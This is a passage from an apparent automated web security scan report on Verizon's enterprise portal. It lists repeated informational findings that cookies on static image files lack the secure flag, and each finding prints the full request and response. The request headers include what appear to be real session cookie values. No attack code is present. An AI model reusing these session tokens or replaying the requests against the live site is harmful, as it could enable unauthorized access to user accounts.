Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 117
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "75-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT


6.18. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 105
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "69-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7144
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT


6.19. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 607
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "25f-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:25:25 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:24 GMT

...[SNIP]...

6.20. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 248
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "f8-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7188
Date: Mon, 05 Sep 2011 22:25:26 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

...[SNIP]...

6.21. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 334
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "14e-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7156
Date: Mon, 05 Sep 2011 22:22:46 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

...[SNIP]...

6.22. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 810
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "32a-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:46 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

...[SNIP]...

6.23. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 330
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "14a-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7161
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

...[SNIP]...

6.24. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 805
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "325-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:46 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

...[SNIP]...

6.25. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 219
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "db-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:43 GMT

...[SNIP]...

6.26. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 63
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "3f-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

GIF89a...............................!.......,............!4    .;

6.27. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
